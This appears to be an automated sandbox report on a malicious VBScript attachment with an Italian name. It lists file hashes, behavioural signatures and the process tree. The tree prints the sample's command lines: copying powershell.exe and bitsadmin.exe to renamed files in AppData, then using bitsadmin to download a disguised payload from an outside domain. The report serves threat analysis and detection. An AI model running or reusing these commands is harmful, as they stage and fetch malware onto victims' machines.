Analysis
-
max time kernel
29s -
max time network
28s -
platform
windows7_x64 -
resource
win7v200722 -
submitted
14-09-2020 12:13
Static task
static1
Behavioral task
behavioral1
Sample
Allegato_doc_BRNLSN65H44H501N.vbs
Resource
win7v200722
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Allegato_doc_BRNLSN65H44H501N.vbs
Resource
win10
windows10_x64
0 signatures
0 seconds
General
-
Target
Allegato_doc_BRNLSN65H44H501N.vbs
-
Size
3KB
-
MD5
399426adfd02de2e27ebca41608be96e
-
SHA1
7b7629618e0cf7d4826b6c8c6dceea344233df3b
-
SHA256
a1bfd39eb6057b5797ca04c30d5ca65641585e72ecdfdd8e0c1ac24d126b4056
-
SHA512
68db9c58318ddab4dcfee56d08a49bf6cf494a095b1d3a0972ca3ac2167caa063abb5a41e90ba2ed2142cccc19cb7063434503d5d4e95c8141d3145b480a47cd
Score
8/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 1524 nUpPg.exe -
Suspicious use of WriteProcessMemory 10 IoCs
description pid Process procid_target PID 1056 wrote to memory of 792 1056 WScript.exe 25 PID 1056 wrote to memory of 792 1056 WScript.exe 25 PID 1056 wrote to memory of 792 1056 WScript.exe 25 PID 1056 wrote to memory of 1048 1056 WScript.exe 27 PID 1056 wrote to memory of 1048 1056 WScript.exe 27 PID 1056 wrote to memory of 1048 1056 WScript.exe 27 PID 1056 wrote to memory of 1524 1056 WScript.exe 29 PID 1056 wrote to memory of 1524 1056 WScript.exe 29 PID 1056 wrote to memory of 1524 1056 WScript.exe 29 PID 1056 wrote to memory of 1524 1056 WScript.exe 29
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Allegato_doc_BRNLSN65H44H501N.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1056 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Users\Admin\AppData\Roaming\znUpPg.exe2⤵PID:792
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c copy /Z c:\Windows\SysWOW64\bitsadmin.exe C:\Users\Admin\AppData\Roaming\nUpPg.exe2⤵PID:1048
-
-
C:\Users\Admin\AppData\Roaming\nUpPg.exe"C:\Users\Admin\AppData\Roaming\nUpPg.exe" /transfer AbVPtb /download https://innerearthartistry.com/nerea/BRNLSN65H44H501N/1x1.gif C:\Users\Admin\AppData\Roaming\1x1.gif2⤵
- Executes dropped EXE
PID:1524
-